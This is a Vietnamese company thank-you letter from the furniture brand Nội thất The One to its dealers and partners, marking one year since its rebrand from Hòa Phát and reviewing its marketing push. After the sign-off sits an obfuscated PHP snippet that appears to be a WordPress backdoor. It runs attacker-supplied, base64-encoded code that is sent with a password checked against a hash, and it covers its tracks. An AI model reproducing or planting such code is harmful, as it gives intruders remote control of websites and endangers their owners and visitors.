Thư cảm ơn – Nhân dịp 01 năm chuyển đổi thương hiệu

THƯ CẢM ƠN

Kính gửi: Quý đại lý, Quý đối tác

Vậy là tròn 1 năm kể từ ngày Nội thất Hòa Phát chính thức đổi tên thành Nội thất The One cùng tầm nhìn mới – khát vọng mới. Giống như kỳ vọng vào tên gọi The One – dịch nghĩa là số Một, người DẪN ĐẦU, trong năm qua, Nội thất The One đã liên tục triển khai hùng loạt chương trình phủ sóng trên nhiều nền tảng, nhằm tiếp cận và giới thiệu rõ nét về một thương hiệu “quen thuộc” nay vươn mình “đổi mới”, trẻ trung hơn, nhiều màu sắc vò rõ ràng hơn tới người tiêu dùng khắp cả nước, cụ thể:
Liên tục phủ sóng trên các kênh truyền thông chính thống như VTV, VNExpress, Dân trí, WOV Giao thông… dưới định dạng TVC Quảng cóo, tin tức, phóng sự… và nhận được sự hưởng ứng, theo dõi của đông đảo CBCNV, Quý đại lý, Quý đối tác.

Thay đổi và giới thiệu mẫu maquette biển hiệu Nội thất The One tới hệ thống đại lý khắp 3 miền. Từng bước trang bị các công cụ hỗ trợ điểm bán (POSM) tới các đại lý cấp 1 tại các thành phố lớn.
Liên tục tập trung vào phút triển sản phẩm mới, sản phẩm cải tiến để đáp ứng nhu cầu người tiêu dùng trong và ngoài nước.

Với nhiều nỗ lực không ngừng nghỉ, Nội thất The One vẫn luôn tiếp tục xây dựng và phát triển hệ thống đại lý trải dài ba miền, theo phương châm: “Lấy khách hàng làm trọng tâm, trân trọng đối tác và đồng hành cùng đại lý”, phát huy những giá trị cốt lõi để làm nên tên tuổi của Nội thất Hòa Phát trong gần 30 năm qua: “Sáng tạo – Khát vọng – Nhiệt huyết – Quan tâm“.

Nội thất The One xin được gửi lời cảm ơn sâu sắc, cùng tình cảm quý mến chân thành tới các đại lý, đối tác đẽ tin tưởng và ủng hộ Nội thất The One suốt chặng đường dài, đặc biệt là năm vừa qua. Với những tình cảm đó, Nội thất The One tin rằng năm 2023, sẽ là năm bùng nổ của cóc giá trị cốt lõi, của sự gắn bó để tiếp tục đồng hành và phút triển xa hơn. Cùng nhau, và cùng nhìn về một hướng, Nội thất The One cùng các Quý đại lý, Quý đối tác sẽ tiếp tục chinh phục các đỉnh cao mới, vững bền và
mạnh mẽ hơn.

Năm 2023, Nội thất The One sẽ tiếp tục phát triển các chương trình phủ sóng thương hiệu trên đa nền tảng khắp mọi miền tổ quốc. Mọi thông tin sẽ được cập nhật tới các Quý đại lý, quý đối tác trong thời gian tới!

Trên trọng cảm ơn,
Nội thất The One

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}